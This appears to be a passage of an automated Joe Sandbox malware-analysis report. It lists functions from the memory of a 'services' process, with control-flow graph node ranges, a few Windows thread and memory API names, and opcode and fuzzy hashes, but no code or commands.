                                                                                                                                Function 00007FFD9B94C744 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 111 7ffd9b94c744-7ffd9b94c74a 112 7ffd9b94c74b-7ffd9b94c779 111->112 113 7ffd9b94c77b 112->113 114 7ffd9b94c77c-7ffd9b94c789 112->114 113->114 114->112 115 7ffd9b94c78b-7ffd9b94c852 ResumeThread 114->115 119 7ffd9b94c854 115->119 120 7ffd9b94c85a-7ffd9b94c8a4 115->120 119->120
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: f55cbba4cc9453288b8ad0b65b1d57e879b88d7e432a52ad1b9f785de39aed86
                                                                                                                                • Instruction ID: 32bc5dfbac6b378bf5509ca9359d28fe0a657b07c862fd0213a9c1a18ca7e2ff
                                                                                                                                • Opcode Fuzzy Hash: f55cbba4cc9453288b8ad0b65b1d57e879b88d7e432a52ad1b9f785de39aed86
                                                                                                                                • Instruction Fuzzy Hash: F7518C7090D79C8FDB55DFA8C894AE9BFF0EF16310F0441ABD049D72A2DA799846CB11
                                                                                                                                Function 00007FFD9B94AF5D Relevance: 1.6, APIs: 1, Instructions: 139threadinjectionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 123 7ffd9b94af5d-7ffd9b94af69 124 7ffd9b94af74-7ffd9b94b042 SuspendThread 123->124 125 7ffd9b94af6b-7ffd9b94af73 123->125 128 7ffd9b94b044 124->128 129 7ffd9b94b04a-7ffd9b94b094 124->129 125->124 128->129
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SuspendThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3178671153-0
                                                                                                                                • Opcode ID: 993daf05d39e9886bd02e564f6348c7af95593c45f21e635521001774816fdbc
                                                                                                                                • Instruction ID: b74b9f3f6d9794822b91147589a7ab498c07fbeb5edfa6115e43d402658f1b44
                                                                                                                                • Opcode Fuzzy Hash: 993daf05d39e9886bd02e564f6348c7af95593c45f21e635521001774816fdbc
                                                                                                                                • Instruction Fuzzy Hash: 8F416D70E0865C8FDB58DFA8D895BEDBBF0FB5A310F10416AD049E7252DA74A846CF40
                                                                                                                                Function 00007FFD9B7A434D Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 132 7ffd9b7a434d-7ffd9b7a4483 VirtualAlloc 137 7ffd9b7a4485 132->137 138 7ffd9b7a448b-7ffd9b7a44ef 132->138 137->138
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B79C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b79c000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: b1e2edec3e9cd2eb9d3ff37c2ab8b2d26b290246c9b0cd6a456651f8ea9680fd
                                                                                                                                • Instruction ID: e59d0163268fe9168d0eacf99e335fe96aadab076e7e435eae14b804e8b32836
                                                                                                                                • Opcode Fuzzy Hash: b1e2edec3e9cd2eb9d3ff37c2ab8b2d26b290246c9b0cd6a456651f8ea9680fd
                                                                                                                                • Instruction Fuzzy Hash: F0514970908A5C8FDF94EF68C845BE9BBF1FB69310F1042AAD04DE3251CB71A9858B80
                                                                                                                                Function 00007FFD9BFE0E08 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 142 7ffd9bfe0e08-7ffd9bfe0e0c 143 7ffd9bfe0e89-7ffd9bfe0e9f 142->143 144 7ffd9bfe0e0e-7ffd9bfe0e6f 142->144 146 7ffd9bfe0ea0-7ffd9bfe0ec3 143->146 150 7ffd9bfe0ec8-7ffd9bfe0ed8 144->150 152 7ffd9bfe0e71-7ffd9bfe0e74 144->152 146->150 155 7ffd9bfe0ed9-7ffd9bfe0ef1 150->155 152->146 154 7ffd9bfe0e76-7ffd9bfe0e7e 152->154 154->155 156 7ffd9bfe0e80-7ffd9bfe0e83 154->156 157 7ffd9bfe0f4a 155->157 158 7ffd9bfe0ef3-7ffd9bfe0ef6 155->158 159 7ffd9bfe0e85-7ffd9bfe0e87 156->159 160 7ffd9bfe0f00 156->160 165 7ffd9bfe0d45-7ffd9bfe0d49 157->165 166 7ffd9bfe0f50-7ffd9bfe0f55 157->166 161 7ffd9bfe0ef8-7ffd9bfe0eff 158->161 162 7ffd9bfe0f22-7ffd9bfe0f43 158->162 159->143 163 7ffd9bfe0f5b-7ffd9bfe0f67 call 7ffd9bfe0f6c 160->163 164 7ffd9bfe0f01-7ffd9bfe0f05 160->164 161->160 169 7ffd9bfe0f7c-7ffd9bfe0f80 161->169 162->157 163->169 170 7ffd9bfe0f07-7ffd9bfe0f21 164->170 171 7ffd9bfe0f82-7ffd9bfe0f8e 164->171 167 7ffd9bfe0d69-7ffd9bfe0d8b 165->167 168 7ffd9bfe0d4b-7ffd9bfe0d67 165->168 166->165 167->165 168->167 169->171 170->162 174 7ffd9bfe0fc6-7ffd9bfe0ff9 171->174 175 7ffd9bfe0f90-7ffd9bfe0f9a 171->175 180 7ffd9bfe0f9c-7ffd9bfe0fa3 174->180 185 7ffd9bfe0ffb-7ffd9bfe1005 174->185 175->180 182 7ffd9bfe0fa5-7ffd9bfe0fc1 180->182 183 7ffd9bfe0fc3-7ffd9bfe0fc4 180->183 182->183 183->174 185->180
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: b399400a9882ca2258d1c3307bc8ad04c4d2b7f41be5e72e169e38d5c1ecc594
                                                                                                                                • Instruction ID: e2849ede1594519cc37d0b79eabe9da8755f48b8714eb68ba16b6f23cac5520a
                                                                                                                                • Opcode Fuzzy Hash: b399400a9882ca2258d1c3307bc8ad04c4d2b7f41be5e72e169e38d5c1ecc594
                                                                                                                                • Instruction Fuzzy Hash: 84618031A0964E8FDB68DF58C861AB9B7F1FF58310F10427AD04DD72A2DB356946CB40
                                                                                                                                Function 00007FFD9BE69DD8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 4ff77dc0dd1ce9712d539f3d37dd4f643f36b17dbc8103559e896143dcd8953d
                                                                                                                                • Instruction ID: 9441958a8635f02c8b2a8938fbffd4e5d3380d378f694794cfbd5da96f470f14
                                                                                                                                • Opcode Fuzzy Hash: 4ff77dc0dd1ce9712d539f3d37dd4f643f36b17dbc8103559e896143dcd8953d
                                                                                                                                • Instruction Fuzzy Hash: 47515975E0960E8FDB69DBD8C4655FDBBB5FF58300F1140BAD01AE72A2DA396A01CB40
                                                                                                                                Function 00007FFD9BFE6A28 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 224 7ffd9bfe6a28-7ffd9bfe6a40 226 7ffd9bfe6a48-7ffd9bfe6a73 224->226 230 7ffd9bfe6a9c-7ffd9bfe6aa2 226->230 231 7ffd9bfe6aa9-7ffd9bfe6aaf 230->231 232 7ffd9bfe6a75-7ffd9bfe6a8e 231->232 233 7ffd9bfe6ab1-7ffd9bfe6ab6 231->233 236 7ffd9bfe6b85-7ffd9bfe6b95 232->236 237 7ffd9bfe6a94-7ffd9bfe6a99 232->237 234 7ffd9bfe6abc-7ffd9bfe6af1 233->234 235 7ffd9bfe69a3-7ffd9bfe69e8 233->235 235->231 241 7ffd9bfe69ee-7ffd9bfe69f4 235->241 243 7ffd9bfe6b98-7ffd9bfe6be6 236->243 244 7ffd9bfe6b97 236->244 237->230 245 7ffd9bfe69f6 241->245 246 7ffd9bfe69a5-7ffd9bfe6b7d 241->246 244->243 247 7ffd9bfe6a1f-7ffd9bfe6a26 245->247 246->236 247->224 250 7ffd9bfe69f8-7ffd9bfe6a11 247->250 250->236 253 7ffd9bfe6a17-7ffd9bfe6a1c 250->253 253->247
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: ed64719e43011d3eeb85109d174a50a066cf70c3443244faf6eb47c1750b066c
                                                                                                                                • Instruction ID: 3b7a0892b2b2e707588ff1685a34f86f2889803cf0cf4f5da5b403bd983df34c
                                                                                                                                • Opcode Fuzzy Hash: ed64719e43011d3eeb85109d174a50a066cf70c3443244faf6eb47c1750b066c
                                                                                                                                • Instruction Fuzzy Hash: A4517D31E1A94E9FDB59CFD8C4605BDB7B1EF44300F1142BED01AE72A2CA3A6A01CB50
                                                                                                                                Function 00007FFD9BE62188 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 256 7ffd9be62188-7ffd9be621a0 258 7ffd9be621a8-7ffd9be621d3 256->258 262 7ffd9be621fc-7ffd9be62202 258->262 263 7ffd9be62209-7ffd9be6220f 262->263 264 7ffd9be62211-7ffd9be62216 263->264 265 7ffd9be621d5-7ffd9be621ee 263->265 268 7ffd9be62103-7ffd9be62148 264->268 269 7ffd9be6221c-7ffd9be62251 264->269 266 7ffd9be621f4-7ffd9be621f9 265->266 267 7ffd9be622e5-7ffd9be622f5 265->267 266->262 274 7ffd9be622f8-7ffd9be62346 267->274 275 7ffd9be622f7 267->275 268->263 273 7ffd9be6214e-7ffd9be62154 268->273 276 7ffd9be62156 273->276 277 7ffd9be62105-7ffd9be622dd 273->277 275->274 281 7ffd9be6217f-7ffd9be62186 276->281 277->267 281->256 283 7ffd9be62158-7ffd9be62171 281->283 283->267 285 7ffd9be62177-7ffd9be6217c 283->285 285->281
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 01a2146bde4736749388a175454dfd7d4ab41f2e1c8272da758d7addea1ea33a
                                                                                                                                • Instruction ID: df9ce7ad9a1d15d805bb2f3e50f90475253f6c105ce27b136e369e84ccbf9d73
                                                                                                                                • Opcode Fuzzy Hash: 01a2146bde4736749388a175454dfd7d4ab41f2e1c8272da758d7addea1ea33a
                                                                                                                                • Instruction Fuzzy Hash: 75514B71E0A54E9FDB69DBD8C4616FCB7B1FF58300F1140BAD41AE7296DA392A05CB40
                                                                                                                                Function 00007FFD9B7DE069 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DG_H
                                                                                                                                • API String ID: 0-96666378
                                                                                                                                • Opcode ID: 67d71d6fb430c5a4d670364633130aa44568e89478d104e4ce66ff7909269ed6
                                                                                                                                • Instruction ID: 836c0cb4faa0b024aba76d69d601cbee7dc0ce0230d602590f7ec7caddb96733
                                                                                                                                • Opcode Fuzzy Hash: 67d71d6fb430c5a4d670364633130aa44568e89478d104e4ce66ff7909269ed6
                                                                                                                                • Instruction Fuzzy Hash: 38D05EB0E4620E8AEB709B1484983B473A1AB64340F0103B58009931B1CE791AC88B00
                                                                                                                                Function 00007FFD9BFEB802 Relevance: .7, Instructions: 693COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e82c820758037d8b1dce2006c8a8953819dc3fa0112038b7beb26f8bd1194c1a
                                                                                                                                • Instruction ID: 6ebe0f7e77361c5028f8e38e3cbb3ca9997ef029f39b619deeb31ffe89bbed2b
                                                                                                                                • Opcode Fuzzy Hash: e82c820758037d8b1dce2006c8a8953819dc3fa0112038b7beb26f8bd1194c1a
                                                                                                                                • Instruction Fuzzy Hash: 7F32623075991C8FDB99EF68D4A8D7573E2EFA8700B1541A9E00BC72B6DE25EC41CB81
                                                                                                                                Function 00007FFD9BFE49D0 Relevance: .5, Instructions: 461COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ba97dcece4f5fe439496444713cb61a8a544cfb0629ea21ea35dc51cc81bc0f
                                                                                                                                • Instruction ID: e12474fd737e1145819d44cbd4ce1c8da29514f09677971b6d62551f97902c8a
                                                                                                                                • Opcode Fuzzy Hash: 5ba97dcece4f5fe439496444713cb61a8a544cfb0629ea21ea35dc51cc81bc0f
                                                                                                                                • Instruction Fuzzy Hash: DFE1373060D64D8FD759DF18C855AB9B7E1FF82324F1542AEE04ECB1A2DA36A942CB41
                                                                                                                                Function 00007FFD9B7D8E7D Relevance: .4, Instructions: 431COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d336c95c0d98bd17d95656f4ef9834ce4b01cbb39051f7ad3d32286774f5855e
                                                                                                                                • Instruction ID: 22041c77fcc0ea130b67a299c9619289cf98bf039e4d58bd726a5f2a08f9dc57
                                                                                                                                • Opcode Fuzzy Hash: d336c95c0d98bd17d95656f4ef9834ce4b01cbb39051f7ad3d32286774f5855e
                                                                                                                                • Instruction Fuzzy Hash: 9EF15371E1965E8FDB98DF58C865BBCB7A2FF98340F4442BAD00DD32A2DA346944CB41
                                                                                                                                Function 00007FFD9BE63440 Relevance: .4, Instructions: 416COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a13418aa344cbca316b55f7d770dbaa5585c70c4eb0ce419930ca801fd4a7f5
                                                                                                                                • Instruction ID: 86ed9134b66702fa647a4e01ceb3ba053409dc1212fcc681c9fc2d635cfc6fcb
                                                                                                                                • Opcode Fuzzy Hash: 4a13418aa344cbca316b55f7d770dbaa5585c70c4eb0ce419930ca801fd4a7f5
                                                                                                                                • Instruction Fuzzy Hash: EEE1F230B0EA4E8FE37ACB9CD4A457977E5FF54310B15057EC08BC36A2DA2AB9428741
                                                                                                                                Function 00007FFD9BE64829 Relevance: .4, Instructions: 409COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5d0fc7a00f82ae1eecf3ed611a3f51290bf0c20aadcf0fe465e6aded130e5a6f
                                                                                                                                • Instruction ID: 4e38fda6a44c00f763afc515290a1283c81c5e3d68b79ab127bc05ad6a32ec41
                                                                                                                                • Opcode Fuzzy Hash: 5d0fc7a00f82ae1eecf3ed611a3f51290bf0c20aadcf0fe465e6aded130e5a6f
                                                                                                                                • Instruction Fuzzy Hash: 16C15A31B0E54ECFE778DF5888656B437E5FF94310B0502BDE05EC36A2EE1AA9068781
                                                                                                                                Function 00007FFD9BFE7CE1 Relevance: .4, Instructions: 408COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2837f9e93762335b699a11b68ca9d5e9ec9eed816d6c2c869ed4160374ea8ea6
                                                                                                                                • Instruction ID: 95334217588bd165d94b7b039d14dcf8bbd3c9b6ca5ef449c019437ea6f5564d
                                                                                                                                • Opcode Fuzzy Hash: 2837f9e93762335b699a11b68ca9d5e9ec9eed816d6c2c869ed4160374ea8ea6
                                                                                                                                • Instruction Fuzzy Hash: A0D1F430B0EB4A4FE379DF68D4A557577E1FF44300B15467EC08A876A2DE3AB9428781
                                                                                                                                Function 00007FFD9BE6A06F Relevance: .3, Instructions: 335COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 142c421e2c038095e86d304cfa5da92db95eea192ed119a35d72dac90d43c8d1
                                                                                                                                • Instruction ID: 210cadec4e25a73b56b8c722c1da507a5464e38f8fa54c8ec617f627e4a495d1
                                                                                                                                • Opcode Fuzzy Hash: 142c421e2c038095e86d304cfa5da92db95eea192ed119a35d72dac90d43c8d1
                                                                                                                                • Instruction Fuzzy Hash: 80C1ED30A1A55ECFEB29CF48C4E05B437A1FF45301B5155BDC84B8B69ADA39F982CB80
                                                                                                                                Function 00007FFD9BE69902 Relevance: .3, Instructions: 330COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fa3f52b2ecdeabd7a971451b5acb642e770c38b425cca4bdd0122cea25e75694
                                                                                                                                • Instruction ID: f6decbef904480c688e015257b654fa1da2c4d894f78fbf535994dc30bf3f1a4
                                                                                                                                • Opcode Fuzzy Hash: fa3f52b2ecdeabd7a971451b5acb642e770c38b425cca4bdd0122cea25e75694
                                                                                                                                • Instruction Fuzzy Hash: B3C10234B09A4ACFE758DF68C0A46B4B7E5FF58300F4541B9C04EC7AA6DB29B951C784
                                                                                                                                Function 00007FFD9BE61CB2 Relevance: .3, Instructions: 327COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f7d22aa7a7574b1ea4287295b9638ec22e1aa5ec41f0ab6be8ba443b63409fa2
                                                                                                                                • Instruction ID: 5c6164f80467677175d95823716e4c3668b3ee135641af0fab796797d5578c97
                                                                                                                                • Opcode Fuzzy Hash: f7d22aa7a7574b1ea4287295b9638ec22e1aa5ec41f0ab6be8ba443b63409fa2
                                                                                                                                • Instruction Fuzzy Hash: 03C1E530B1994ACFE75ADFA8C0A06B8B7A5FF14300F455179D04EC7A96CB29F951C782
                                                                                                                                Function 00007FFD9BFE9078 Relevance: .3, Instructions: 319COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0ae819e77b140ada584d6fa27983daec1c8026b60a9415faebedc96aadf35142
                                                                                                                                • Instruction ID: faad56b39a51358c6e75a5fa9c51294deed70a622ff77e4e7567677711249007
                                                                                                                                • Opcode Fuzzy Hash: 0ae819e77b140ada584d6fa27983daec1c8026b60a9415faebedc96aadf35142
                                                                                                                                • Instruction Fuzzy Hash: C8B19E3190E78D8FDB52DF6488686ED7FB0FF16300F0685ABD444C71A2DA396A49CB51
                                                                                                                                Function 00007FFD9BE67D50 Relevance: .3, Instructions: 310COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 926714356852da5d6ccee90cded92733cde47fc06a2b2c46108848420961acf5
                                                                                                                                • Instruction ID: e4f58c70d270a135d6f02231787d6f414b6b99de84cdfdf232d020270c0a702c
                                                                                                                                • Opcode Fuzzy Hash: 926714356852da5d6ccee90cded92733cde47fc06a2b2c46108848420961acf5
                                                                                                                                • Instruction Fuzzy Hash: 22A1B330B18A1D8FDB58DB58C8959B9B3E2FF55314B1181AAD44EC72A2DA36FC42CB41
                                                                                                                                Function 00007FFD9BE623FF Relevance: .3, Instructions: 296COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b54b824eb5981df9fcb74e65b39fcd7a577b2df786921076ced73f213c517af9
                                                                                                                                • Instruction ID: b98321bcfde473b3e38f1a72ad061e6f3c6358d5c028df9b13160869d52dc1da
                                                                                                                                • Opcode Fuzzy Hash: b54b824eb5981df9fcb74e65b39fcd7a577b2df786921076ced73f213c517af9
                                                                                                                                • Instruction Fuzzy Hash: 6FB18D706196458FEB5DCF58C0E05B137A5FF49310B5142BDC84A8B69BCB39F982CB81
                                                                                                                                Function 00007FFD9BFE6DB5 Relevance: .3, Instructions: 292COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 26552d548f52200b64db168ccfa0c4e10edc9032e9a79c9e5f309c3c2a74f283
                                                                                                                                • Instruction ID: 7a3add7068b864df98e567c7cd110535bf308d241f7fdde951b195d71ce8319f
                                                                                                                                • Opcode Fuzzy Hash: 26552d548f52200b64db168ccfa0c4e10edc9032e9a79c9e5f309c3c2a74f283
                                                                                                                                • Instruction Fuzzy Hash: B9B1D23061A95A8FEB58CF58C4E46B037A1FF44310B5546BDC85B8B69BD739F982CB80
                                                                                                                                Function 00007FFD9BE672F2 Relevance: .3, Instructions: 291COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 260c5f919fe5ad90f74aad77a5fbc018bde82ac0cd911908a4d8ca80be627e3e
                                                                                                                                • Instruction ID: 824d47e94028c6fa9878bce008e517397d2a0fdbe181ed4a1367ca59a3320cc5
                                                                                                                                • Opcode Fuzzy Hash: 260c5f919fe5ad90f74aad77a5fbc018bde82ac0cd911908a4d8ca80be627e3e
                                                                                                                                • Instruction Fuzzy Hash: B8218152F0F69BCEF63556E8283517C5A486F51760F6A02F6DC6E860F6DC0E2A81128A
                                                                                                                                Function 00007FFD9B790A19 Relevance: .3, Instructions: 281COMMON
